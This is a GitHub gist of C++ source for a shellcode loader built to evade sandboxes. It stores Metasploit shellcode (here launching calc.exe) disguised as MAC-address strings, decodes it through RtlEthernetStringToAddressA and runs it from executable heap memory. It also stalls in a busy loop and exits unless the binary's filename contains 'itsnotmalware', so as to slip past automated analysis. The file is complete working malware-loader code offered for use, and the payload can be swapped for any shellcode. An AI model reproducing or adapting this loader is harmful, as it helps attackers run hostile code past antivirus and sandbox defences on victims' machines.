Created
October 25, 2023 06:11
-
-
Save caueb/ea6cbc96b52e22c4004ba49d511a2b4d to your computer and use it in GitHub Desktop.
Simple Sandbox evasion checking if the name of executable is in the path.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
// Payload encoding using HellsShell (https://github.com/NUL0x4C/HellShell) | |
// Compile with clang: clang++ -w -Oz -mwindows itsnotmalware.cpp -o itsnotmalware.exe | |
#include "Windows.h" | |
#include "stdio.h" | |
#include <iostream> | |
#include <string> | |
#include <regex> | |
#define _CRT_SECURE_NO_WARNINGS | |
#pragma warning(disable:4996) | |
#define MAX_OP 89888996 // Define a constant MAX_OP with a value of 89888996 | |
using namespace std; | |
// msfvenom calc.exe | |
char* MacArray[] = { | |
"FC-48-83-E4-F0-E8", "C0-00-00-00-41-51", "41-50-52-51-56-48", "31-D2-65-48-8B-52", "60-48-8B-52-18-48", "8B-52-20-48-8B-72", | |
"50-48-0F-B7-4A-4A", "4D-31-C9-48-31-C0", "AC-3C-61-7C-02-2C", "20-41-C1-C9-0D-41", "01-C1-E2-ED-52-41", "51-48-8B-52-20-8B", | |
"42-3C-48-01-D0-8B", "80-88-00-00-00-48", "85-C0-74-67-48-01", "D0-50-8B-48-18-44", "8B-40-20-49-01-D0", "E3-56-48-FF-C9-41", | |
"8B-34-88-48-01-D6", "4D-31-C9-48-31-C0", "AC-41-C1-C9-0D-41", "01-C1-38-E0-75-F1", "4C-03-4C-24-08-45", "39-D1-75-D8-58-44", | |
"8B-40-24-49-01-D0", "66-41-8B-0C-48-44", "8B-40-1C-49-01-D0", "41-8B-04-88-48-01", "D0-41-58-41-58-5E", "59-5A-41-58-41-59", | |
"41-5A-48-83-EC-20", "41-52-FF-E0-58-41", "59-5A-48-8B-12-E9", "57-FF-FF-FF-5D-48", "BA-01-00-00-00-00", "00-00-00-48-8D-8D", | |
"01-01-00-00-41-BA", "31-8B-6F-87-FF-D5", "BB-F0-B5-A2-56-41", "BA-A6-95-BD-9D-FF", "D5-48-83-C4-28-3C", "06-7C-0A-80-FB-E0", | |
"75-05-BB-47-13-72", "6F-6A-00-59-41-89", "DA-FF-D5-63-61-6C", "63-2E-65-78-65-00" | |
}; | |
#define NumberOfElements 46 | |
typedef NTSTATUS(NTAPI* fnRtlEthernetStringToAddressA)( | |
PCSTR S, | |
PCSTR* Terminator, | |
PVOID Addr | |
); | |
BOOL checkSandbox() { | |
char path [MAX_PATH]; // Declare a character array to hold the file path | |
int cpt = 0; | |
int i = 0; | |
for (i = 0; i < MAX_OP; i++) | |
{ | |
cpt++; | |
} | |
if (cpt == MAX_OP) | |
{ | |
GetModuleFileName(NULL, path, MAX_PATH); | |
regex str_expr ("(.*)(itsnotmalware)(.*)"); // Regex to find "itsnotmalware" | |
if (regex_match (path,str_expr)) // Check if the file path matches the regular expression pattern | |
{ | |
return TRUE; | |
} | |
return FALSE; | |
} | |
return FALSE; | |
} | |
BOOL MacDeobfuscation(IN CHAR* MacArray[], IN SIZE_T NmbrOfElements, OUT PBYTE * ppDAddress, OUT SIZE_T * pDSize) { | |
PBYTE pBuffer = NULL, | |
TmpBuffer = NULL; | |
SIZE_T sBuffSize = NULL; | |
PCSTR Terminator = NULL; | |
NTSTATUS STATUS = NULL; | |
fnRtlEthernetStringToAddressA pRtlEthernetStringToAddressA = (fnRtlEthernetStringToAddressA)GetProcAddress(GetModuleHandle(TEXT("NTDLL")), "RtlEthernetStringToAddressA"); | |
if (pRtlEthernetStringToAddressA == NULL) { | |
printf("[!] GetProcAddress Failed With Error : %d \n", GetLastError()); | |
return FALSE; | |
} | |
sBuffSize = NmbrOfElements * 6; | |
pBuffer = (PBYTE)HeapAlloc(GetProcessHeap(), 0, sBuffSize); | |
if (pBuffer == NULL) { | |
printf("[!] HeapAlloc Failed With Error : %d \n", GetLastError()); | |
return FALSE; | |
} | |
TmpBuffer = pBuffer; | |
for (int i = 0; i < NmbrOfElements; i++) { | |
if ((STATUS = pRtlEthernetStringToAddressA(MacArray[i], &Terminator, TmpBuffer)) != 0x0) { | |
printf("[!] RtlEthernetStringToAddressA Failed At [%s] With Error 0x%0.8X\n", MacArray[i], STATUS); | |
return FALSE; | |
} | |
TmpBuffer = (PBYTE)(TmpBuffer + 6); | |
} | |
*ppDAddress = pBuffer; | |
*pDSize = sBuffSize; | |
return TRUE; | |
} | |
int main() { | |
PBYTE pDeobfuscatedPayload = NULL; | |
SIZE_T sDeobfuscatedSize = NULL; | |
if (!checkSandbox()) { | |
printf("[-] Name of the program running is different...exit...\n"); | |
return -1; | |
}; | |
// Decode the shellcode | |
if (!MacDeobfuscation(MacArray, NumberOfElements, &pDeobfuscatedPayload, &sDeobfuscatedSize)) { | |
printf("[-] Decoding error!\n"); | |
return -1; | |
} | |
// Allocate memory for the decrypted MSF-Shellcode | |
void* exec = VirtualAlloc(0, sDeobfuscatedSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
// Copy the MSF-Shellcode into the allocated memory | |
memcpy(exec, pDeobfuscatedPayload, sDeobfuscatedSize); | |
// Execute the decrypted MSF-Shellcode in memory | |
((void(*)())exec)(); | |
return 0; | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment